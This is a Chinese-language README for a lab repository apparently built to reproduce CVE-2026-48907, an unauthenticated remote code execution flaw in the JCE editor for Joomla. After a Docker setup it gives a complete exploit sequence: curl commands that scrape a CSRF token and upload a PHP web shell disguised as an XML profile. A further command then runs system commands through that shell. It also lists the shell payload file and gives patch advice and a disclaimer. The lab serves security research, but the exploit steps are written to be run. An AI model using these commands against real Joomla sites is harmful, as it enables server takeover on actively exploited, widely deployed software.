PSsec 针对 CVE-2026-48907 的教育性安全研究实验环境。
CVE-2026-48907 是 JCE(Joomla Content Editor) 中的一个严重(CVSS 10.0)未认证远程代码执行漏洞。JCE 是 Joomla 安装最广泛的编辑器扩展,影响所有 ≤ 2.9.99.4 版本。
profiles.import 端点接受文件上传且无需任何认证。攻击者可以上传一个伪装成 XML 配置文件的恶意 PHP 文件,该文件会被写入服务器的 tmp/ 目录,并通过 HTTP 直接执行——无需任何凭据。
docker compose up -d
在浏览器中打开 http://localhost:8080,并使用以下凭据完成设置向导:
| 字段 | 值 |
|---|---|
| 数据库主机 | db |
| 数据库名称 | joomla |
| 数据库用户 | joomla |
| 数据库密码 | joomlapass |
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip
然后在 Joomla 管理后台 → 系统 → 扩展 → 安装 → 上传该 ZIP 文件。
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
| sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
| head -n1)
curl -i -s -b cookies.txt -c cookies.txt \
-F "[email protected];type=application/xml" \
-F "task=profiles.import" \
-F "${TOKEN}=1" \
"$URL/index.php?option=com_jce"
curl -i -s -b cookies.txt -c cookies.txt \
"$URL/tmp/shell.xml.php?cmd=id"
预期输出:uid=33(www-data) gid=33(www-data)
| 文件 | 描述 |
|---|---|
docker-compose.yml | 启动易受攻击的 Joomla 5.3.1 + MySQL 8.0 |
shell.xml.php | 最小 PHP 网页后门载荷 |
instructions.txt | 逐步漏洞利用说明 |
立即将 JCE 更新到 2.9.99.5 或更高版本。
官方供应商公告及面向旧版 Joomla 的免费补丁: JCE 安全更新 — joomlacontenteditor.net
本仓库严格用于教育和授权安全研究目的。
仅允许针对您拥有或已获得明确书面授权的系统进行测试。未经授权将此材料用于您不拥有的系统是非法且不道德的。作者及 Pansophical OU 不对滥用本内容承担任何责任。
本实验环境故意保留漏洞。请勿将其暴露于互联网或任何不可信网络。
由 PSsec 提供
| 详情 | 值 |
|---|
| CVE | CVE-2026-48907 |
| CVSS 评分 | 10.0 严重 |
| 受影响版本 | JCE ≤ 2.9.99.4 |
| 修复版本 | JCE ≥ 2.9.99.5 |
| CISA KEV 列入 | 是 — 2026 年 6 月 16 日 |
| 正在被积极利用 | 是 |